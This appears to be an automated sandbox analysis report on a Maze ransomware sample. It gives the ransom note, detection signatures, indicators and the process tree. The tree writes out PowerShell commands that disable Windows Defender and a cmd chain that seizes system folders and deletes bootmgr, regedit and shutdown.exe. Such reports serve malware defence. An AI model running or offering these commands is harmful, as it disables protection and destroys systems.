maze | 28a062934db772364022a16d60c799b1b66b1419593d409a4cd6f5d6b52c1b85

Analysis

max time kernel
349s
max time network
1566s
platform
windows11_x64
resource
win11
submitted
27-10-2021 09:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b53415f6_lcvDB3iF4J.exe

Score

10^/10

maze discovery evasion exploit ransomware themida trojan

Malware Config

Extracted

Path

C:\DECRYPT-FILES.TXT

Ransom Note

Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) If you can't use tor in your country you can write to us on our temporary email address. [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe Our temporary e-mail address: [email protected]

Emails

[email protected]

URLs

http://mail2tor2zyjdctd.onion/

Signatures

Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Disables Task Manager via registry modification
evasion

Executes dropped EXE 1 IoCs

Processes:

VSSVC.exe

pid	Process
1556	VSSVC.exe

Possible privilege escalation attempt 5 IoCs

exploit

Processes:

icacls.exetakeown.exetakeown.exeicacls.exetakeown.exe

pid	Process
4300	icacls.exe
2280	takeown.exe
3360	takeown.exe
4872	icacls.exe
4732	takeown.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VSSVC.exeb53415f6_lcvDB3iF4J.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VSSVC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VSSVC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b53415f6_lcvDB3iF4J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b53415f6_lcvDB3iF4J.exe

Modifies file permissions 1 TTPs 5 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid	Process
3360	takeown.exe
4872	icacls.exe
4732	takeown.exe
4300	icacls.exe
2280	takeown.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/2876-148-0x0000000000BC0000-0x0000000000BC1000-memory.dmp	themida
behavioral2/files/0x000300000002b1ac-166.dat	themida
behavioral2/files/0x000300000002b1ac-165.dat	themida
behavioral2/memory/1556-187-0x0000000000CA0000-0x0000000000CA1000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

b53415f6_lcvDB3iF4J.exeVSSVC.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	b53415f6_lcvDB3iF4J.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VSSVC.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

b53415f6_lcvDB3iF4J.exeVSSVC.exe

pid	Process
2876	b53415f6_lcvDB3iF4J.exe
1556	VSSVC.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4228	powershell.exe
3152	powershell.exe
2916	powershell.exe
1616	powershell.exe
1616	powershell.exe
4228	powershell.exe
3152	powershell.exe
2916	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

b53415f6_lcvDB3iF4J.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2876	b53415f6_lcvDB3iF4J.exe
Token: SeDebugPrivilege	2876	b53415f6_lcvDB3iF4J.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	powershell.exe
Token: SeSecurityPrivilege	2916	powershell.exe
Token: SeTakeOwnershipPrivilege	2916	powershell.exe
Token: SeLoadDriverPrivilege	2916	powershell.exe
Token: SeSystemProfilePrivilege	2916	powershell.exe
Token: SeSystemtimePrivilege	2916	powershell.exe
Token: SeProfSingleProcessPrivilege	2916	powershell.exe
Token: SeIncBasePriorityPrivilege	2916	powershell.exe
Token: SeCreatePagefilePrivilege	2916	powershell.exe
Token: SeBackupPrivilege	2916	powershell.exe
Token: SeRestorePrivilege	2916	powershell.exe
Token: SeShutdownPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeSystemEnvironmentPrivilege	2916	powershell.exe
Token: SeRemoteShutdownPrivilege	2916	powershell.exe
Token: SeUndockPrivilege	2916	powershell.exe
Token: SeManageVolumePrivilege	2916	powershell.exe
Token: 33	2916	powershell.exe
Token: 34	2916	powershell.exe
Token: 35	2916	powershell.exe
Token: 36	2916	powershell.exe
Token: SeIncreaseQuotaPrivilege	4228	powershell.exe
Token: SeSecurityPrivilege	4228	powershell.exe
Token: SeTakeOwnershipPrivilege	4228	powershell.exe
Token: SeLoadDriverPrivilege	4228	powershell.exe
Token: SeSystemProfilePrivilege	4228	powershell.exe
Token: SeSystemtimePrivilege	4228	powershell.exe
Token: SeProfSingleProcessPrivilege	4228	powershell.exe
Token: SeIncBasePriorityPrivilege	4228	powershell.exe
Token: SeCreatePagefilePrivilege	4228	powershell.exe
Token: SeBackupPrivilege	4228	powershell.exe
Token: SeRestorePrivilege	4228	powershell.exe
Token: SeShutdownPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeSystemEnvironmentPrivilege	4228	powershell.exe
Token: SeRemoteShutdownPrivilege	4228	powershell.exe
Token: SeUndockPrivilege	4228	powershell.exe
Token: SeManageVolumePrivilege	4228	powershell.exe
Token: 33	4228	powershell.exe
Token: 34	4228	powershell.exe
Token: 35	4228	powershell.exe
Token: 36	4228	powershell.exe
Token: SeIncreaseQuotaPrivilege	1616	powershell.exe
Token: SeSecurityPrivilege	1616	powershell.exe
Token: SeTakeOwnershipPrivilege	1616	powershell.exe
Token: SeLoadDriverPrivilege	1616	powershell.exe
Token: SeSystemProfilePrivilege	1616	powershell.exe
Token: SeSystemtimePrivilege	1616	powershell.exe
Token: SeProfSingleProcessPrivilege	1616	powershell.exe
Token: SeIncBasePriorityPrivilege	1616	powershell.exe
Token: SeCreatePagefilePrivilege	1616	powershell.exe
Token: SeBackupPrivilege	1616	powershell.exe
Token: SeRestorePrivilege	1616	powershell.exe
Token: SeShutdownPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeSystemEnvironmentPrivilege	1616	powershell.exe
Token: SeRemoteShutdownPrivilege	1616	powershell.exe
Token: SeUndockPrivilege	1616	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

b53415f6_lcvDB3iF4J.exeVSSVC.execmd.exe

description	pid	Process	procid_target
PID 2876 wrote to memory of 4228	2876	b53415f6_lcvDB3iF4J.exe	81
PID 2876 wrote to memory of 4228	2876	b53415f6_lcvDB3iF4J.exe	81
PID 2876 wrote to memory of 4228	2876	b53415f6_lcvDB3iF4J.exe	81
PID 2876 wrote to memory of 1616	2876	b53415f6_lcvDB3iF4J.exe	83
PID 2876 wrote to memory of 1616	2876	b53415f6_lcvDB3iF4J.exe	83
PID 2876 wrote to memory of 1616	2876	b53415f6_lcvDB3iF4J.exe	83
PID 2876 wrote to memory of 2916	2876	b53415f6_lcvDB3iF4J.exe	84
PID 2876 wrote to memory of 2916	2876	b53415f6_lcvDB3iF4J.exe	84
PID 2876 wrote to memory of 2916	2876	b53415f6_lcvDB3iF4J.exe	84
PID 2876 wrote to memory of 3152	2876	b53415f6_lcvDB3iF4J.exe	87
PID 2876 wrote to memory of 3152	2876	b53415f6_lcvDB3iF4J.exe	87
PID 2876 wrote to memory of 3152	2876	b53415f6_lcvDB3iF4J.exe	87
PID 2876 wrote to memory of 1556	2876	b53415f6_lcvDB3iF4J.exe	89
PID 2876 wrote to memory of 1556	2876	b53415f6_lcvDB3iF4J.exe	89
PID 2876 wrote to memory of 1556	2876	b53415f6_lcvDB3iF4J.exe	89
PID 1556 wrote to memory of 2064	1556	VSSVC.exe	91
PID 1556 wrote to memory of 2064	1556	VSSVC.exe	91
PID 1556 wrote to memory of 2064	1556	VSSVC.exe	91
PID 2064 wrote to memory of 3360	2064	cmd.exe	93
PID 2064 wrote to memory of 3360	2064	cmd.exe	93
PID 2064 wrote to memory of 3360	2064	cmd.exe	93
PID 2064 wrote to memory of 4872	2064	cmd.exe	94
PID 2064 wrote to memory of 4872	2064	cmd.exe	94
PID 2064 wrote to memory of 4872	2064	cmd.exe	94
PID 2064 wrote to memory of 4732	2064	cmd.exe	95
PID 2064 wrote to memory of 4732	2064	cmd.exe	95
PID 2064 wrote to memory of 4732	2064	cmd.exe	95
PID 2064 wrote to memory of 4300	2064	cmd.exe	96
PID 2064 wrote to memory of 4300	2064	cmd.exe	96
PID 2064 wrote to memory of 4300	2064	cmd.exe	96
PID 2064 wrote to memory of 2280	2064	cmd.exe	97
PID 2064 wrote to memory of 2280	2064	cmd.exe	97
PID 2064 wrote to memory of 2280	2064	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe
"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4228
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
  "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2064
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3360
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\System32 /grant Admin:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4872
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /f C:\Windows\System32\drivers
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4732
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\System32\drivers /grant Admin:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4300
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /f C:\Windows\System32\LogonUI.exe
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2280

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5
1f44ea38384d3df0d45b027825ce5a6a

SHA1
f50e4af252f1fdc7202968ab7e43fde2f8f9a944

SHA256
62cd2de3714542b49ff831972415e443743602129bf84e07268a51599c3ed9b8

SHA512
571df704ef24ec84ed7131d2d0ff6f961b191bdfcde0cd0e944e91cccbe7f8cd70a83c832be1c9c0694858bc4273fd053ee9480155d4e79f99965039a80794d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f6b424b3b2b46b0ba51a86aa5d27959f

SHA1
ff69c0d6cc7d30d0bd895c5131ab253e304ace01

SHA256
0e3c0bab7069a23271c0777af1d0df58e865d024196456272eab41414ebdfeca

SHA512
27ff79ac5ac0a3e6fd826075731fc9c6215e0f2daf51f2860621b68717e5704392f9c5f7c78c4a3f8eadda3ba15771bf267d5d893b7bd38e515d2029224b19a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
283293fda4cdb8929f1547c55e29fe42

SHA1
f903a9daca3a941302f02b0f7321764a95edf8f5

SHA256
fe837edb430596581828f0fe79fdddaf46ef9e2ed8f47b9767ad57528420ba1a

SHA512
a8ca3dbd66fd6b999a64d97b8e262213823fea9080902ae86d25b7e544efc67d4955fcf325c44662f16123a80b33e87ab7c0cb104d7e07a1c01e3440733459ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
2665375f88d32cc80aa7a57fde89a738

SHA1
b365c5004534bb184be68dd681cd9bd171011795

SHA256
73649e60220f41cc8944da72547aceb58de5bbde117db8c32cc482fe84850b5e

SHA512
1885f33b185cfe3ab8908866791e7b5009f0709aa094dde69f46b904b8959b35680113fcfb193a963ded72d922049535870d2523ff0e8fe92debd915429f3ba8

Download Submit
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5
e4f24d91d8e7290ffd6afc8aa01c6d63

SHA1
b552c6af33cc5a62379028687924406cba8ff74d

SHA256
5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

SHA512
ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5
e4f24d91d8e7290ffd6afc8aa01c6d63

SHA1
b552c6af33cc5a62379028687924406cba8ff74d

SHA256
5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

SHA512
ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

Download Submit
memory/1556-187-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/1556-202-0x0000000005540000-0x0000000005541000-memory.dmp

Filesize
4KB

Download
memory/1556-162-0x0000000000000000-mapping.dmp

Download
memory/1616-225-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/1616-217-0x0000000008590000-0x0000000008591000-memory.dmp

Filesize
4KB

Download
memory/1616-157-0x0000000000000000-mapping.dmp

Download
memory/1616-161-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/1616-175-0x0000000007300000-0x0000000007301000-memory.dmp

Filesize
4KB

Download
memory/1616-184-0x0000000007302000-0x0000000007303000-memory.dmp

Filesize
4KB

Download
memory/1616-164-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

Filesize
4KB

Download
memory/1616-213-0x00000000081C0000-0x00000000081C1000-memory.dmp

Filesize
4KB

Download
memory/1616-258-0x000000007F2E0000-0x000000007F2E1000-memory.dmp

Filesize
4KB

Download
memory/1616-233-0x0000000007305000-0x0000000007307000-memory.dmp

Filesize
8KB

Download
memory/2064-300-0x0000000000000000-mapping.dmp

Download
memory/2280-305-0x0000000000000000-mapping.dmp

Download
memory/2876-155-0x00000000062E0000-0x0000000006886000-memory.dmp

Filesize
5.6MB

Download
memory/2876-148-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/2876-152-0x0000000006480000-0x0000000006481000-memory.dmp

Filesize
4KB

Download
memory/2876-151-0x00000000063E0000-0x00000000063E1000-memory.dmp

Filesize
4KB

Download
memory/2876-150-0x0000000006890000-0x0000000006891000-memory.dmp

Filesize
4KB

Download
memory/2876-153-0x0000000006E40000-0x0000000006E41000-memory.dmp

Filesize
4KB

Download
memory/2876-154-0x0000000006660000-0x0000000006661000-memory.dmp

Filesize
4KB

Download
memory/2916-181-0x0000000004D12000-0x0000000004D13000-memory.dmp

Filesize
4KB

Download
memory/2916-158-0x0000000000000000-mapping.dmp

Download
memory/2916-235-0x0000000004D15000-0x0000000004D17000-memory.dmp

Filesize
8KB

Download
memory/2916-180-0x0000000004D10000-0x0000000004D11000-memory.dmp

Filesize
4KB

Download
memory/2916-170-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2916-169-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2916-266-0x000000007EFB0000-0x000000007EFB1000-memory.dmp

Filesize
4KB

Download
memory/3152-178-0x0000000006880000-0x0000000006881000-memory.dmp

Filesize
4KB

Download
memory/3152-159-0x0000000000000000-mapping.dmp

Download
memory/3152-198-0x0000000007600000-0x0000000007601000-memory.dmp

Filesize
4KB

Download
memory/3152-171-0x0000000002AD0000-0x0000000002AD1000-memory.dmp

Filesize
4KB

Download
memory/3152-172-0x0000000002AD0000-0x0000000002AD1000-memory.dmp

Filesize
4KB

Download
memory/3152-234-0x0000000006885000-0x0000000006887000-memory.dmp

Filesize
8KB

Download
memory/3152-182-0x0000000006882000-0x0000000006883000-memory.dmp

Filesize
4KB

Download
memory/3360-301-0x0000000000000000-mapping.dmp

Download
memory/4228-236-0x0000000006F45000-0x0000000006F47000-memory.dmp

Filesize
8KB

Download
memory/4228-163-0x00000000030C0000-0x00000000030C1000-memory.dmp

Filesize
4KB

Download
memory/4228-229-0x0000000008610000-0x0000000008611000-memory.dmp

Filesize
4KB

Download
memory/4228-262-0x000000007EE50000-0x000000007EE51000-memory.dmp

Filesize
4KB

Download
memory/4228-174-0x0000000007580000-0x0000000007581000-memory.dmp

Filesize
4KB

Download
memory/4228-160-0x00000000030C0000-0x00000000030C1000-memory.dmp

Filesize
4KB

Download
memory/4228-167-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/4228-183-0x0000000006F42000-0x0000000006F43000-memory.dmp

Filesize
4KB

Download
memory/4228-209-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/4228-173-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/4228-195-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/4228-156-0x0000000000000000-mapping.dmp

Download
memory/4300-304-0x0000000000000000-mapping.dmp

Download
memory/4732-303-0x0000000000000000-mapping.dmp

Download
memory/4872-302-0x0000000000000000-mapping.dmp

Download